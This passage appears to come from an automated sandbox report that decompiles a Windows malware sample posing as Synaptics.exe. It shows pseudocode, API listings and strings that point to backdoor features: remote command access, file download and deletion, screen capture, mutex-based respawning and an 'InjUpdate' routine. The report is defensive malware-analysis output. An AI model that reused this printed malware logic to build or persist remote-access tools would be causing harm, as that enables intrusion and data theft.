							_t59[1] = 0xd7b0;
							return 0x69;
						}
						if(_t34 == 2) {
							_t59[8] = E00402D04;
						}
						goto L34;
					}
					_t59[1] = _t59[1] - 1;
					_t40 = GetFileSize( *_t59, 0) + 1;
					if(_t40 == 0) {
						goto L37;
					}
					_t41 = _t40 - 0x81;
					if(_t41 < 0) {
						_t41 = 0;
					}
					if(SetFilePointer( *_t59, _t41, 0, 0) + 1 == 0) {
						goto L37;
					} else {
						_t44 = ReadFile( *_t59,  &(_t59[0x53]), 0x80, _t60, 0);
						_t58 = 0;
						if(_t44 != 1) {
							goto L37;
						}
						_t46 = 0;
						while(_t46 < _t58) {
							if( *((char*)(_t59 + _t46 + 0x14c)) == 0xe) {
								if(SetFilePointer( *_t59, _t46 - _t58, 0, 2) + 1 == 0 || SetEndOfFile( *_t59) != 1) {
									goto L37;
								} else {
									goto L30;
								}
							}
							_t46 = _t46 + 1;
						}
						goto L30;
					}
				}
			}
















                                                                                                                                                                                          0x00402d71
                                                                                                                                                                                          0x00402d75
                                                                                                                                                                                          0x00402d78
                                                                                                                                                                                          0x00402d84
                                                                                                                                                                                          0x00402d91
                                                                                                                                                                                          0x00402d96
                                                                                                                                                                                          0x00402d9b
                                                                                                                                                                                          0x00402da0
                                                                                                                                                                                          0x00402d86
                                                                                                                                                                                          0x00402d87
                                                                                                                                                                                          0x00402da9
                                                                                                                                                                                          0x00402dae
                                                                                                                                                                                          0x00402db3
                                                                                                                                                                                          0x00402d89
                                                                                                                                                                                          0x00402d8a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402dba
                                                                                                                                                                                          0x00402dbf
                                                                                                                                                                                          0x00402dc4
                                                                                                                                                                                          0x00402dc4
                                                                                                                                                                                          0x00402dc9
                                                                                                                                                                                          0x00402dc9
                                                                                                                                                                                          0x00402dd0
                                                                                                                                                                                          0x00402dd7
                                                                                                                                                                                          0x00402de2
                                                                                                                                                                                          0x00402ea0
                                                                                                                                                                                          0x00402ea7
                                                                                                                                                                                          0x00402eae
                                                                                                                                                                                          0x00402eb7
                                                                                                                                                                                          0x00402ec3
                                                                                                                                                                                          0x00402ecb
                                                                                                                                                                                          0x00402ec5
                                                                                                                                                                                          0x00402ecb
                                                                                                                                                                                          0x00402ecb
                                                                                                                                                                                          0x00402eb9
                                                                                                                                                                                          0x00402ecb
                                                                                                                                                                                          0x00402ecb
                                                                                                                                                                                          0x00402ed3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402ed5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402de8
                                                                                                                                                                                          0x00402df8
                                                                                                                                                                                          0x00402e00
                                                                                                                                                                                          0x00402f0e
                                                                                                                                                                                          0x00402f0e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402f14
                                                                                                                                                                                          0x00402e06
                                                                                                                                                                                          0x00402e0e
                                                                                                                                                                                          0x00402ed7
                                                                                                                                                                                          0x00402edd
                                                                                                                                                                                          0x00402ef6
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402ef6
                                                                                                                                                                                          0x00402ee1
                                                                                                                                                                                          0x00402ee8
                                                                                                                                                                                          0x00402efc
                                                                                                                                                                                          0x00402f01
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402f07
                                                                                                                                                                                          0x00402eed
                                                                                                                                                                                          0x00402eef
                                                                                                                                                                                          0x00402eef
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402eed
                                                                                                                                                                                          0x00402e14
                                                                                                                                                                                          0x00402e21
                                                                                                                                                                                          0x00402e22
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402e28
                                                                                                                                                                                          0x00402e2d
                                                                                                                                                                                          0x00402e2f
                                                                                                                                                                                          0x00402e2f
                                                                                                                                                                                          0x00402e3e
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402e44
                                                                                                                                                                                          0x00402e59
                                                                                                                                                                                          0x00402e5e
                                                                                                                                                                                          0x00402e60
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402e66
                                                                                                                                                                                          0x00402e68
                                                                                                                                                                                          0x00402e74
                                                                                                                                                                                          0x00402e88
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402e98
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402e98
                                                                                                                                                                                          0x00402e88
                                                                                                                                                                                          0x00402e76
                                                                                                                                                                                          0x00402e76
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402e68
                                                                                                                                                                                          0x00402e3e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402DF8
                                                                                                                                                                                          • GetFileSize.KERNEL32(?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E1C
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00402E38
                                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000080,?,00000000,00000000,?,-00000080,00000000,00000000,?,00000000,00000000,80000000,00000001,00000000), ref: 00402E59
                                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000002), ref: 00402E82
                                                                                                                                                                                          • SetEndOfFile.KERNEL32(?,?,00000000,00000000,00000002), ref: 00402E90
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5), ref: 00402ECB
                                                                                                                                                                                          • GetFileType.KERNEL32(?,000000F5), ref: 00402EE1
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,000000F5), ref: 00402EFC
                                                                                                                                                                                          • GetLastError.KERNEL32(000000F5), ref: 00402F14
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$HandlePointer$CloseCreateErrorLastReadSizeType
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1694776339-0
                                                                                                                                                                                          • Opcode ID: 216d7dd165d84aaa1dcaa059831678b57b37a28d44f159f1317e3b4b33460f23
                                                                                                                                                                                          • Instruction ID: 9aa9312da4e91c771af0b4e33a38407941ada986436eec9a0907e2913daab745
                                                                                                                                                                                          • Opcode Fuzzy Hash: 216d7dd165d84aaa1dcaa059831678b57b37a28d44f159f1317e3b4b33460f23
                                                                                                                                                                                          • Instruction Fuzzy Hash: 31418C30140701AAE730AF24CA4DB6775A5AF00754F208E3FE5A6BA6E0D7FD9841979D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00495BD4 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 105threadCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateThread
                                                                                                                                                                                          • String ID: CheckMe$DeleteFile$DownloadFile$GetCMDAccess$GetScreenImage$ListDir$ListDisk
                                                                                                                                                                                          • API String ID: 2422867632-2040281516
                                                                                                                                                                                          • Opcode ID: c6c63ff19019f6ce6dad48876d8236b37c5083c8ea257557d2b23598fcd7fc72
                                                                                                                                                                                          • Instruction ID: cc4d067afddf7cdfb89c5fbb3b31213d9db14bacd25ac7606a572a3bc3506bde
                                                                                                                                                                                          • Opcode Fuzzy Hash: c6c63ff19019f6ce6dad48876d8236b37c5083c8ea257557d2b23598fcd7fc72
                                                                                                                                                                                          • Instruction Fuzzy Hash: D131CF30710A049BCF12EBA5DC46A1A7BB4EF89714B70867BF600D77A1CA3CAD09871C
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0049A3E0 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 163COMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 50%
                                                                                                                                                                                          			E0049A3E0(intOrPtr __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t38;
				void* _t39;
				intOrPtr _t49;
				intOrPtr _t51;
				intOrPtr _t53;
				intOrPtr _t55;
				intOrPtr _t57;
				intOrPtr _t59;
				intOrPtr _t61;
				void* _t62;
				intOrPtr _t69;
				intOrPtr _t73;
				void* _t83;
				void* _t86;
				intOrPtr _t92;
				void* _t97;
				void* _t98;
				intOrPtr _t103;
				intOrPtr _t127;

				_t137 = __fp0;
				_t124 = __esi;
				_t123 = __edi;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(__esi);
				_t92 = __eax;
				_push(_t127);
				_push(0x49a5ef);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				if(__edx == 0) {
					E004967D4(__eax, __eax, "ControlCenter -> Pasif");
					__eflags = 0;
					E0049A098(_t92, _t92, 0, 0, __edi, __esi, __fp0, 0, 0, 0, 0, 0);
					L14:
					_pop(_t103);
					 *[fs:eax] = _t103;
					_push(E0049A5F6);
					return E004049E4( &_v20, 4);
				}
				E004967D4(__eax, __eax, "ControlCenter -> Aktif");
				if( *((intOrPtr*)(_t92 + 0x308)) == 0) {
					 *((intOrPtr*)(_t92 + 0x308)) = E0045C064(_t92, 1);
				}
				_t27 =  *((intOrPtr*)(_t92 + 0x308));
				 *((intOrPtr*)(_t27 + 0x44)) = _t92;
				 *((intOrPtr*)(_t27 + 0x40)) = 0x49a668;
				_t29 = E004738BC(0, _t92); // executed
				_t31 = E00441704(_t92);
				_t32 =  *0x49d6b8; // 0x4967bc
				_t97 = _t29;
				 *0x49f149 = E00477AD8(_t32, _t92, _t31, _t123, _t124);
				E00402B68(1,  &_v8);
				E00404DCC(_v8, "InjUpdate");
				if(0 != 0) {
					L8:
					_t38 =  *0x49d6b4; // 0x4967a8, executed
					_t39 = E0047423C(_t38, _t92, 1, _t124, _t133); // executed
					if(_t39 != 0) {
						E0045A800();
					} else {
						E00498684(_t92, _t92, _t123, _t124); // executed
						E00498F04(_t92, _t123, _t124); // executed
						if(E00498B40(_t92, _t92, _t123, _t124) == 0) {
							_t49 =  *0x49f1b0; // 0x22b335c
							_push(E00409780(_t49, _t97, 1, __eflags));
							_t51 =  *0x49f1b4; // 0x22b336c
							_push(E00409780(_t51, _t97, 1, __eflags));
							_t53 =  *0x49f1b8; // 0x22b337c
							_push(E00409780(_t53, _t97, 1, __eflags));
							_t55 =  *0x49f1bc; // 0x22b338c
							_push(E00409780(_t55, _t97, 1, __eflags));
							_t57 =  *0x49f1c0; // 0x22b339c
							_push(E00409780(_t57, _t97, 1, __eflags));
							_t59 =  *0x49f1a8; // 0x22b3338
							_push(E00409780(_t59, _t97, 1, __eflags));
							_t61 =  *0x49f1a4; // 0x22b3328
							_t62 = E00409780(_t61, _t97, 1, __eflags);
							_pop(_t98); // executed
							E0049A098(_t92, _t92, _t98, _t62, _t123, _t124, _t137); // executed
							E00499FAC(_t92, 1);
						} else {
							E00498998(_t92, _t92, 1, _t123, _t124);
						}
					}
					goto L14;
				}
				_t69 =  *0x49d6b4; // 0x4967a8
				_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t69));
				_t131 = _t124;
				if(_t124 == 0) {
					goto L8;
				} else {
					goto L5;
				}
				do {
					L5:
					CloseHandle(_t124);
					_t73 =  *0x49d6b4; // 0x4967a8
					_t124 = OpenMutexA(0x1f0001, 0, E00404E80(_t73));
					E004737B0( &_v12);
					_push( &_v12);
					E00402B68(0,  &_v20);
					E00409E18(_v20,  &_v16);
					_pop(_t83);
					E00404C88(_t83, _v16);
					_t86 = E00409A48(_v12, _t131);
					_t132 = _t86;
					if(_t86 != 0) {
						E00475A94("Synaptics.exe", _t92, _t123, _t124, _t132);
					}
					_t133 = _t124;
				} while (_t124 != 0);
				goto L8;
			}






























                                                                                                                                                                                          0x0049a3e0
                                                                                                                                                                                          0x0049a3e0
                                                                                                                                                                                          0x0049a3e0
                                                                                                                                                                                          0x0049a3e5
                                                                                                                                                                                          0x0049a3e6
                                                                                                                                                                                          0x0049a3e7
                                                                                                                                                                                          0x0049a3e8
                                                                                                                                                                                          0x0049a3e9
                                                                                                                                                                                          0x0049a3ea
                                                                                                                                                                                          0x0049a3eb
                                                                                                                                                                                          0x0049a3ef
                                                                                                                                                                                          0x0049a3f0
                                                                                                                                                                                          0x0049a3f5
                                                                                                                                                                                          0x0049a3f8
                                                                                                                                                                                          0x0049a3fd
                                                                                                                                                                                          0x0049a5ba
                                                                                                                                                                                          0x0049a5cb
                                                                                                                                                                                          0x0049a5cf
                                                                                                                                                                                          0x0049a5d4
                                                                                                                                                                                          0x0049a5d6
                                                                                                                                                                                          0x0049a5d9
                                                                                                                                                                                          0x0049a5dc
                                                                                                                                                                                          0x0049a5ee
                                                                                                                                                                                          0x0049a5ee
                                                                                                                                                                                          0x0049a40a
                                                                                                                                                                                          0x0049a416
                                                                                                                                                                                          0x0049a426
                                                                                                                                                                                          0x0049a426
                                                                                                                                                                                          0x0049a42c
                                                                                                                                                                                          0x0049a432
                                                                                                                                                                                          0x0049a435
                                                                                                                                                                                          0x0049a43e
                                                                                                                                                                                          0x0049a446
                                                                                                                                                                                          0x0049a44d
                                                                                                                                                                                          0x0049a452
                                                                                                                                                                                          0x0049a458
                                                                                                                                                                                          0x0049a465
                                                                                                                                                                                          0x0049a472
                                                                                                                                                                                          0x0049a477
                                                                                                                                                                                          0x0049a4fd
                                                                                                                                                                                          0x0049a4ff
                                                                                                                                                                                          0x0049a504
                                                                                                                                                                                          0x0049a50b
                                                                                                                                                                                          0x0049a5ac
                                                                                                                                                                                          0x0049a511
                                                                                                                                                                                          0x0049a513
                                                                                                                                                                                          0x0049a51a
                                                                                                                                                                                          0x0049a528
                                                                                                                                                                                          0x0049a538
                                                                                                                                                                                          0x0049a542
                                                                                                                                                                                          0x0049a545
                                                                                                                                                                                          0x0049a54f
                                                                                                                                                                                          0x0049a552
                                                                                                                                                                                          0x0049a55c
                                                                                                                                                                                          0x0049a55f
                                                                                                                                                                                          0x0049a569
                                                                                                                                                                                          0x0049a56c
                                                                                                                                                                                          0x0049a576
                                                                                                                                                                                          0x0049a579
                                                                                                                                                                                          0x0049a583
                                                                                                                                                                                          0x0049a586
                                                                                                                                                                                          0x0049a58b
                                                                                                                                                                                          0x0049a594
                                                                                                                                                                                          0x0049a595
                                                                                                                                                                                          0x0049a59e
                                                                                                                                                                                          0x0049a52a
                                                                                                                                                                                          0x0049a52c
                                                                                                                                                                                          0x0049a52c
                                                                                                                                                                                          0x0049a528
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0049a50b
                                                                                                                                                                                          0x0049a47d
                                                                                                                                                                                          0x0049a494
                                                                                                                                                                                          0x0049a496
                                                                                                                                                                                          0x0049a498
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0049a49a
                                                                                                                                                                                          0x0049a49a
                                                                                                                                                                                          0x0049a49b
                                                                                                                                                                                          0x0049a4a0
                                                                                                                                                                                          0x0049a4b7
                                                                                                                                                                                          0x0049a4bc
                                                                                                                                                                                          0x0049a4c4
                                                                                                                                                                                          0x0049a4ca
                                                                                                                                                                                          0x0049a4d5
                                                                                                                                                                                          0x0049a4dd
                                                                                                                                                                                          0x0049a4de
                                                                                                                                                                                          0x0049a4e6
                                                                                                                                                                                          0x0049a4eb
                                                                                                                                                                                          0x0049a4ed
                                                                                                                                                                                          0x0049a4f4
                                                                                                                                                                                          0x0049a4f4
                                                                                                                                                                                          0x0049a4f9
                                                                                                                                                                                          0x0049a4f9
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • OpenMutexA.KERNEL32 ref: 0049A48F
                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,001F0001,00000000,00000000), ref: 0049A49B
                                                                                                                                                                                          • OpenMutexA.KERNEL32 ref: 0049A4B2
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: MutexOpen$CloseHandle
                                                                                                                                                                                          • String ID: ControlCenter -> Aktif$ControlCenter -> Pasif$InjUpdate$Synaptics.exe
                                                                                                                                                                                          • API String ID: 1942958553-1737343353
                                                                                                                                                                                          • Opcode ID: 556d743f26ce14f7f429c08212ffce121a76abbe247dd051e0c13cf30d8e719a
                                                                                                                                                                                          • Instruction ID: 032596fc6928d1f920dd250c266260124ec275c25dbd90c6f41682d3cc039f83
                                                                                                                                                                                          • Opcode Fuzzy Hash: 556d743f26ce14f7f429c08212ffce121a76abbe247dd051e0c13cf30d8e719a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8B5149716002009FDB00EF6ADC82A9A37A9AB54308B11457FF804EB393DA7DED19879D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004590AC Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 125windowCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E004590AC(void* __ecx, char __edx) {
				char _v5;
				char _v261;
				void* __ebx;
				void* __ebp;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t43;
				struct HINSTANCE__** _t53;
				struct HICON__* _t55;
				intOrPtr _t58;
				struct HINSTANCE__** _t60;
				void* _t67;
				char* _t69;
				char* _t75;
				intOrPtr _t81;
				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				char _t93;
				void* _t104;
				void* _t105;

				_t93 = __edx;
				_t91 = __ecx;
				if(__edx != 0) {
					_t105 = _t105 + 0xfffffff0;
					_t39 = E00403F10(_t39, _t104);
				}
				_v5 = _t93;
				_t90 = _t39;
				E00421B3C(_t91, 0);
				_t42 =  *0x49dabc; // 0x49b520
				if( *((short*)(_t42 + 2)) == 0) {
					_t89 =  *0x49dabc; // 0x49b520
					 *((intOrPtr*)(_t89 + 4)) = _t90;
					 *_t89 = 0x45a814;
				}
				_t43 =  *0x49dc10; // 0x49b528
				if( *((short*)(_t43 + 2)) == 0) {
					_t88 =  *0x49dc10; // 0x49b528
					 *((intOrPtr*)(_t88 + 4)) = _t90;
					 *_t88 = E0045AA0C;
				}
				 *((char*)(_t90 + 0x34)) = 0;
				 *((intOrPtr*)(_t90 + 0x90)) = E00403BBC(1);
				 *((intOrPtr*)(_t90 + 0xa8)) = E00403BBC(1);
				 *((intOrPtr*)(_t90 + 0x60)) = 0;
				 *((intOrPtr*)(_t90 + 0x84)) = 0;
				 *((intOrPtr*)(_t90 + 0x5c)) = 0xff000018;
				 *((intOrPtr*)(_t90 + 0x78)) = 0x1f4;
				 *((char*)(_t90 + 0x7c)) = 1;
				 *((intOrPtr*)(_t90 + 0x80)) = 0;
				 *((intOrPtr*)(_t90 + 0x74)) = 0x9c4;
				 *((char*)(_t90 + 0x88)) = 0;
				 *((char*)(_t90 + 0x9d)) = 1;
				 *((char*)(_t90 + 0xb4)) = 1;
				_t103 = E0042B3F8(1);
				 *((intOrPtr*)(_t90 + 0x98)) = _t52;
				_t53 =  *0x49d93c; // 0x49e030
				_t55 = LoadIconA( *_t53, "MAINICON"); // executed
				E0042B7C8(_t103, _t55);
				_t20 = _t90 + 0x98; // 0x736d
				_t58 =  *_t20;
				 *((intOrPtr*)(_t58 + 0x14)) = _t90;
				 *((intOrPtr*)(_t58 + 0x10)) = 0x45afac;
				_t60 =  *0x49d93c; // 0x49e030
				GetModuleFileNameA( *_t60,  &_v261, 0x100);
				OemToCharA( &_v261,  &_v261);
				_t67 = E0040E020(0x5c);
				if(_t67 != 0) {
					_t27 = _t67 + 1; // 0x1
					E00409FC4( &_v261, _t27);
				}
				_t69 = E0040E048( &_v261, 0x2e);
				if(_t69 != 0) {
					 *_t69 = 0;
				}
				CharLowerA( &(( &_v261)[1]));
				_t31 = _t90 + 0x8c; // 0x45150c
				E00404C30(_t31, 0x100,  &_v261);
				_t75 =  *0x49d6e4; // 0x49e038
				if( *_t75 == 0) {
					E004593B4(_t90, _t90, 0x100); // executed
				}
				 *((char*)(_t90 + 0x59)) = 1;
				 *((char*)(_t90 + 0x5a)) = 1;
				 *((char*)(_t90 + 0x5b)) = 1;
				 *((char*)(_t90 + 0x9e)) = 1;
				 *((intOrPtr*)(_t90 + 0xa0)) = 0;
				E0045B188(_t90, 0x100);
				E0045BB4C(_t90);
				_t81 = _t90;
				if(_v5 != 0) {
					E00403F68(_t81);
					_pop( *[fs:0x0]);
				}
				return _t90;
			}

























                                                                                                                                                                                          0x004590ac
                                                                                                                                                                                          0x004590ac
                                                                                                                                                                                          0x004590b9
                                                                                                                                                                                          0x004590bb
                                                                                                                                                                                          0x004590be
                                                                                                                                                                                          0x004590be
                                                                                                                                                                                          0x004590c3
                                                                                                                                                                                          0x004590c6
                                                                                                                                                                                          0x004590cc
                                                                                                                                                                                          0x004590d1
                                                                                                                                                                                          0x004590db
                                                                                                                                                                                          0x004590dd
                                                                                                                                                                                          0x004590e2
                                                                                                                                                                                          0x004590e5
                                                                                                                                                                                          0x004590e5
                                                                                                                                                                                          0x004590eb
                                                                                                                                                                                          0x004590f5
                                                                                                                                                                                          0x004590f7
                                                                                                                                                                                          0x004590fc
                                                                                                                                                                                          0x004590ff
                                                                                                                                                                                          0x004590ff
                                                                                                                                                                                          0x00459105
                                                                                                                                                                                          0x00459115
                                                                                                                                                                                          0x00459127
                                                                                                                                                                                          0x0045912f
                                                                                                                                                                                          0x00459134
                                                                                                                                                                                          0x0045913a
                                                                                                                                                                                          0x00459141
                                                                                                                                                                                          0x00459148
                                                                                                                                                                                          0x0045914e
                                                                                                                                                                                          0x00459154
                                                                                                                                                                                          0x0045915b
                                                                                                                                                                                          0x00459162
                                                                                                                                                                                          0x00459169
                                                                                                                                                                                          0x0045917c
                                                                                                                                                                                          0x0045917e
                                                                                                                                                                                          0x00459189
                                                                                                                                                                                          0x00459191
                                                                                                                                                                                          0x0045919a
                                                                                                                                                                                          0x0045919f
                                                                                                                                                                                          0x0045919f
                                                                                                                                                                                          0x004591a5
                                                                                                                                                                                          0x004591a8
                                                                                                                                                                                          0x004591bb
                                                                                                                                                                                          0x004591c3
                                                                                                                                                                                          0x004591d6
                                                                                                                                                                                          0x004591e3
                                                                                                                                                                                          0x004591ea
                                                                                                                                                                                          0x004591ec
                                                                                                                                                                                          0x004591f5
                                                                                                                                                                                          0x004591f5
                                                                                                                                                                                          0x00459202
                                                                                                                                                                                          0x00459209
                                                                                                                                                                                          0x0045920b
                                                                                                                                                                                          0x0045920b
                                                                                                                                                                                          0x00459216
                                                                                                                                                                                          0x0045921b
                                                                                                                                                                                          0x0045922c
                                                                                                                                                                                          0x00459231
                                                                                                                                                                                          0x00459239
                                                                                                                                                                                          0x0045923d
                                                                                                                                                                                          0x0045923d
                                                                                                                                                                                          0x00459242
                                                                                                                                                                                          0x00459246
                                                                                                                                                                                          0x0045924a
                                                                                                                                                                                          0x0045924e
                                                                                                                                                                                          0x00459257
                                                                                                                                                                                          0x0045925f
                                                                                                                                                                                          0x00459266
                                                                                                                                                                                          0x0045926b
                                                                                                                                                                                          0x00459271
                                                                                                                                                                                          0x00459273
                                                                                                                                                                                          0x00459278
                                                                                                                                                                                          0x0045927f
                                                                                                                                                                                          0x00459289

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadIconA.USER32(00400000,MAINICON), ref: 00459191
                                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000,004464A8), ref: 004591C3
                                                                                                                                                                                          • OemToCharA.USER32(?,?), ref: 004591D6
                                                                                                                                                                                          • CharLowerA.USER32(?,?,?,00400000,?,00000100,?,?,?,00446440,00000000,00000000,?,00000000,?,00000000), ref: 00459216
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$FileIconLoadLowerModuleName
                                                                                                                                                                                          • String ID: 0I$8I$MAINICON
                                                                                                                                                                                          • API String ID: 3935243913-3756263232
                                                                                                                                                                                          • Opcode ID: e12e7c4e14c8ae78d78a3e87ed0ee263b2f40a02330ede6867088e6f1150a5ad
                                                                                                                                                                                          • Instruction ID: 5a9b49fbd3013c0ee8ebc8f701b73d14000c1e337c5d680fa8568d3dadbd01b2
                                                                                                                                                                                          • Opcode Fuzzy Hash: e12e7c4e14c8ae78d78a3e87ed0ee263b2f40a02330ede6867088e6f1150a5ad
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8E516170A042449FD740EF29C885B857BE4AB15308F4484FAEC48DF397DBBD9988CB69
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0047B898 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 63libraryloadernetworkCOMMON
                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          C-Code - Quality: 26%
                                                                                                                                                                                          			E0047B898(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				struct HINSTANCE__* _t19;
				intOrPtr _t26;
				void* _t30;
				intOrPtr _t42;
				void* _t51;

				_push(__ebx);
				_v8 = 0;
				_v12 = 0;
				_push(_t51);
				_push(0x47b965);
				_push( *[fs:eax]);
				 *[fs:eax] = _t51 + 0xfffffff0;
				if( *0x49c9fc == 0) {
					 *0x49c9fc = LoadLibraryA("WS2_32.DLL");
					if( *0x49c9fc == 0) {
						_push(GetLastError());
						_push( &_v8);
						_t26 =  *0x49d8e0; // 0x47a5e4
						E00406A70(_t26,  &_v12);
						_push(_v12);
						_v20 = "WS2_32.DLL";
						_v16 = 0xb;
						_pop(_t30);
						E0040A664(_t30, 0,  &_v20);
						E0047A93C(__ebx, _v8, 1, __edi, __esi);
						E00404378();
					}
					_t19 =  *0x49c9fc; // 0x75cd0000
					 *0x49ee80 = GetProcAddress(_t19, "WSAStartup");
					 *0x49ee80(_a4, _a8); // executed
				}
				_pop(_t42);
				 *[fs:eax] = _t42;
				_push(0x47b96c);
				return E004049E4( &_v12, 2);
			}












